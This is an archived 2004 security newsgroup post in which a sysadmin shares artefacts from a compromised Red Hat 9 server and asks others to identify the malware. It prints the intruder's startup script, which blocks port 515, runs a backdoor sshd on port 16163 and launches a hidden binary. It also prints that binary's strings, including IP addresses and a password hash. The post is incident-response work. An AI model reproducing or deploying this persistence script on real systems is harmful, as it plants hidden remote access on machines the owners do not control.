Anyone seen this?

From: John Oliver (joliver_at_john-oliver.net)
Date: 08/02/04

  • Next message: Andrew Rossmann: "Re: ABCNews backscan attack" 
    Date: 02 Aug 2004 20:53:38 GMT

    I'm working on a Red Hat 9 box that got rooted. The intruder put an
    S25system script into /etc/rc3.d/ and /etc/rc5.d/ that contains:

    #!/bin/sh
    /sbin/ipchains -A input -p tcp -y -d 0/0 515 -j DENY 2>&1 > /dev/null
    chmod +x /etc/rc.d/rc3.d/S25system 2>&1 > /dev/null
    chmod +x /etc/rc.d/rc4.d/S25system 2>&1 > /dev/null
    chmod +x /etc/rc.d/rc5.d/S25system 2>&1 > /dev/null
    /usr/bin/sshd2 -q -p 16163 2>&1
    /usr/share/locale/th/LC_MESSAGES/.src/td

    [root@mail root]# strings badfiles/td
    /lib/ld-linux.so.2
    libnsl.so.1
    _Jv_RegisterClasses
    __gmon_start__
    libcrypt.so.1
    crypt
    libc.so.6
    printf
    perror
    malloc
    recvfrom
    socket
    bzero
    setpgid
    strcat
    bind
    inet_addr
    strstr
    rand
    sendto
    strtok
    fork
    sscanf
    inet_ntoa
    time
    strcmp
    htons
    exit
    atoi
    _IO_stdin_used
    __libc_start_main
    strlen
    close
    free
    GLIBC_2.0
    PTRh@
    158.49.116.86
    80.183.185.158
    socket
    bind
    recvfrom
    %s %s %s
    aIf3YWfOhw.V.
    PONG
    *HELLO*

    Anyone know what it is? Google didn't turn anything up. 

    -- 
* John Oliver                              http://www.john-oliver.net/ *
* California gun owners - protect your rights and join the CRPA today! *
* http://www.crpa.org/         Free 3 month trial membership available *
* San Diego shooters come to http://groups.yahoo.com/group/sdshooting/ *
  • Next message: Andrew Rossmann: "Re: ABCNews backscan attack"

    Relevant Pages

    • Anyone seen this?

      (comp.security.unix)
    • Re: Other source port issues (was Re: UDP bind + sendto fails to set s
      ... > You can use setsockopt, with the SO_REUSEADDR option on the socket, and that should allow you to bind using the same port. ... recvfrom is only called on one socket. ...
      (microsoft.public.win32.programmer.networks)
    • Re: Other source port issues (was Re: UDP bind + sendto fails to s
      ... Create and bind the socket before creating both threads; you should then be able to pass the socket handle to both threads. ... WSAEWOULDBLOCK, meaning there's no data available, and WSAECONNRESET, which in UDP terms means that your last sendto operation on this port failed - it's UDP, how can we know that? ... > recvfrom is only called on one socket. ...
      (microsoft.public.win32.programmer.networks)
    • Re: Other source port issues (was Re: UDP bind + sendto fails to set s
      ... > I did a quick trial of this, and although it did allow me to bind both ... > recvfrom is only called on one socket. ... socket bound will be the one that gets all the incoming data. ... > port number. ...
      (microsoft.public.win32.programmer.networks)
    • BIND 9.5.3b1 is now available.
      ... BIND 9.5.3b1 is now available. ... when a zone was not found. ... triggering an assertion failure in ... API and glibc hides parts of the IPv6 Advanced Socket ...
      (comp.protocols.dns.bind)